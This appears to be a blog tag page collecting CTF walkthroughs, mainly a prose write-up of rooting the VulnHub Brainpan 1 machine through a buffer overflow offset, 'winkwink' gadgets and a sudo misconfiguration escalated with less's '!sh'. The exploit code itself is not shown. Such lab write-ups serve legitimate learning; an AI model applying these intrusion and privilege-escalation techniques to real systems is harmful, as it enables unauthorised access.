Pwned Vulnhub Walkthrough

Pwned vulnhub challenge is an easy boot2root machine. One of the key take away from this machine is how you can escalate your privileges using Dockers. This blog post is about how I exploited this machine and what are the different tools I used to make that happen. Below are the requirements: You can get the virtual machine from here : https://www.vulnhub.com/entry/pwned-1,507/ I used Kali as a…

View On WordPress

Brainpan 1

Over the last couple of weeks I have been working on Brainpan- the first in a series downloadable on VulnHub. It usually receives a difficulty rating of intermediate a bit easier than I like to go for but it's recommended by many as an ideal series for both OSCP prep and getting to grips with executing buffer overflow attacks. It's definitely not a challenging machine: you really only need knowledge of directory enumeration and port scanning to discover the binary you need to crack and the binary itself takes very little effort to pwn (the function containing the two needed gadgets is actually hinted at.) After delivering the buffer overflow attack remotely to Brainpan and opening a backdoor to the VM (reverse shell|bind shell,) you're greeted with the final challenge of privelage escalation; in the case of Brainpan 1 this is not a difficult process if you're familiar with what to look for. All in all it's a short and sweet challenge and I did learn more about buffer overflow (as this was my second experience with this)- I even pwned myself locally using a different method of attack I believe is referred to as Ret2Kernel32 (similar concept to Ret2Libc,) I have the code to this but it's pretty much useless as the physical addresses didn't match up. I will now describe the process of rooting Brainpan 1, in addition to an explanation of my local exploit. I will be focusing on buffer overflow for the next few months as I'm still at script kiddy level and I would have taken longer to root Brainpan without the 'winkwink' hint.

Information Gathering

This shows us that there's only two public facing services on Brainpan- A web server listening for HTTP traffic on port 10000 and a service Nmap will identify as Abyss. Our information and vulnerability to exploit is evidently present on these two services. Upon visiting port 10000 though HTTP, you're greeted with a simple image- nothing really to check manually here. Visiting port 9999 reveals Brainpan in ASCII art with ACCESS DENIED already present. Port 9999 can also be accessed via Telnet or TCP (e.g. through Netcat.) Now the best way to proceed from this point would have been to run a Nikto scan on the SimpleHTTPServer; I instead proceeded to run DirBuster which revealed the presence of the 'bin' directory and a file named Brainpan.exe (still working on my organization don't judge. xD)

Exploit Development and Opening Backdoor

strings -a -t x brainpan.exe

Shitstorm was the intended password, leading to ACCESS GRANTED; the process is killed after generation of this output thus I didn't think using it was of any relevance.

objdump -D brainpan.exe

I decided to manually fuzz the exe through Winedbg (though I think I’ll be using a tool for this in the future) which reveals that the binary crashes after the buffer is filled with 520 bytes. I spent a majority of my time cracking the binary: I cracked it locally relatively quickly as I've done a ret2libc attack before thus I was already familiar with those sorts of methods; I made the mistake of assuming the dll.so would have the same physical addresses in both machines (or that the kernel32.dll.so was even the same...) Finally, after some trial and error I came to the conclusion that using the gadgets within 'winkwink' would probably place my shellcode at an executable location on the stack (because of the name for one; the second gadget caught my eye due to the 'pop ebp ; ret' instruction)

Privilege Escalation

With our backdoor open we can now proceed to escalate our privileges. This is not a difficult process in the case of Brainpan if you're aware of what to look for. A simple

sudo -l

will reveal an exploitable oversight present within the system:

Anansi_util will be executed with the SetUID binary set, meaning it will run with the user ID of the binary's owner (guess who this is?) We just need to discover if the binary uses any utilities or commands that will allow us to execute Bash as root. A brief test of the three possible arguments to the binary reveals the use of less- less offers the possibility of executing '!sh' in order to open /bin/sh as a child process. Thus, use of !sh should lead us to root shell access:

From here, I simply changed root's password and logged in via su.

My Local Exploit

The below worked on my version of Kali Linux when the exe is being executed through Wine:

Conclusion

So, Brainpan was definitely a useful experience for me: it was my first exposure to an x86 Windows binary as my first B/O was ELF x86_64 and I've never escalated my privileges through less before. I would definitely recommend rooting it if you're new to buffer overflow and your intention is to develop your knowledge on B/Os. I'll be doing more buffer overflow challenges as I would have liked to develop the exploit based on knowledge rather than trial and error: I've since looked at other walkthroughs for Brainpan and my exploit is different as I believed it was more practical to store the NOP sled and shellcode within the buffer (as the value is being used in strcmp it shouldn't logically be overwritten until after our exploit has executed) and then to pop this value to the stack. There's also many tools I didn't use (e.g. ROPgadget) that may have inspired me if I hadn't forgot about them and I want to improve my speed with these attacks.

Kioptrix 1.1 #3 OWNED. #vulnhub #ctf #kalilinux #hacking #hackers #infosec #wargames #pwned Tercera máquina de la serie Kioptrix. A continuación os dejo la guía de explotación, es pero que os guste! 😀 Kioptrix 1.1 #3 Walkthrought